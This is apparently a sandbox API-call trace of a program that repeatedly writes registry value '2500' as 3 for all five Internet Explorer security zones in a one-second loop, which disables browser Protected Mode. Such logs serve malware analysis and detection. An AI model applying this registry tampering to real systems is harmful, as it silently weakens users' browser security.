	[0119.685] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.685] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.685] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.685] RegCloseKey (hKey=0x698) returned 0x0
	[0119.685] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.685] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.685] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.685] RegCloseKey (hKey=0x698) returned 0x0
	[0119.685] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.685] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.685] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.686] RegCloseKey (hKey=0x698) returned 0x0
	[0119.686] Sleep (dwMilliseconds=0x3e8) 
	[0119.687] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.687] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.687] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.687] RegCloseKey (hKey=0x698) returned 0x0
	[0119.687] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.687] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.688] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.688] RegCloseKey (hKey=0x698) returned 0x0
	[0119.688] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.688] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.688] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.688] RegCloseKey (hKey=0x698) returned 0x0
	[0119.688] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.688] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.688] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.688] RegCloseKey (hKey=0x698) returned 0x0
	[0119.688] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.688] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.688] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.688] RegCloseKey (hKey=0x698) returned 0x0
	[0119.688] Sleep (dwMilliseconds=0x3e8) 
	[0119.690] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.690] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.690] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.690] RegCloseKey (hKey=0x698) returned 0x0
	[0119.690] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.690] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.690] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.690] RegCloseKey (hKey=0x698) returned 0x0
	[0119.690] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.690] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.690] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.690] RegCloseKey (hKey=0x698) returned 0x0
	[0119.690] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.690] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.690] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.690] RegCloseKey (hKey=0x698) returned 0x0
	[0119.690] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.690] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.690] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.691] RegCloseKey (hKey=0x698) returned 0x0
	[0119.691] Sleep (dwMilliseconds=0x3e8) 
	[0119.694] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.694] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.694] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.694] RegCloseKey (hKey=0x698) returned 0x0
	[0119.694] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.694] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.694] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.694] RegCloseKey (hKey=0x698) returned 0x0
	[0119.694] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.694] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.694] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.694] RegCloseKey (hKey=0x698) returned 0x0
	[0119.694] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.694] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.694] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.694] RegCloseKey (hKey=0x698) returned 0x0
	[0119.694] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.694] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.694] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.695] RegCloseKey (hKey=0x698) returned 0x0
	[0119.695] Sleep (dwMilliseconds=0x3e8) 
	[0119.696] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.696] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.696] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.696] RegCloseKey (hKey=0x698) returned 0x0
	[0119.696] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.696] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.696] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.696] RegCloseKey (hKey=0x698) returned 0x0
	[0119.696] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.696] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.697] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.697] RegCloseKey (hKey=0x698) returned 0x0
	[0119.697] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.697] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.697] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.697] RegCloseKey (hKey=0x698) returned 0x0
	[0119.697] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.697] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.697] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.699] RegCloseKey (hKey=0x698) returned 0x0
	[0119.699] Sleep (dwMilliseconds=0x3e8) 
	[0119.700] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.700] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.700] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.700] RegCloseKey (hKey=0x698) returned 0x0
	[0119.700] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.700] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.700] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.700] RegCloseKey (hKey=0x698) returned 0x0
	[0119.701] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.701] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.701] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.701] RegCloseKey (hKey=0x698) returned 0x0
	[0119.701] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.701] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.701] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.701] RegCloseKey (hKey=0x698) returned 0x0
	[0119.701] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.701] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.701] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.701] RegCloseKey (hKey=0x698) returned 0x0
	[0119.701] Sleep (dwMilliseconds=0x3e8) 
	[0119.703] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.703] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.703] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.703] RegCloseKey (hKey=0x698) returned 0x0
	[0119.703] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.703] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.703] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.703] RegCloseKey (hKey=0x698) returned 0x0
	[0119.703] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.703] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.703] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.703] RegCloseKey (hKey=0x698) returned 0x0
	[0119.703] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.703] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.703] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.703] RegCloseKey (hKey=0x698) returned 0x0
	[0119.704] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.704] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.704] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.704] RegCloseKey (hKey=0x698) returned 0x0
	[0119.704] Sleep (dwMilliseconds=0x3e8) 
	[0119.706] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.706] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.706] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.706] RegCloseKey (hKey=0x698) returned 0x0
	[0119.706] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.706] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.706] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.706] RegCloseKey (hKey=0x698) returned 0x0
	[0119.707] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.707] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.707] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.707] RegCloseKey (hKey=0x698) returned 0x0
	[0119.707] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.707] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.707] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.707] RegCloseKey (hKey=0x698) returned 0x0
	[0119.707] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.707] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.707] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.707] RegCloseKey (hKey=0x698) returned 0x0
	[0119.707] Sleep (dwMilliseconds=0x3e8) 
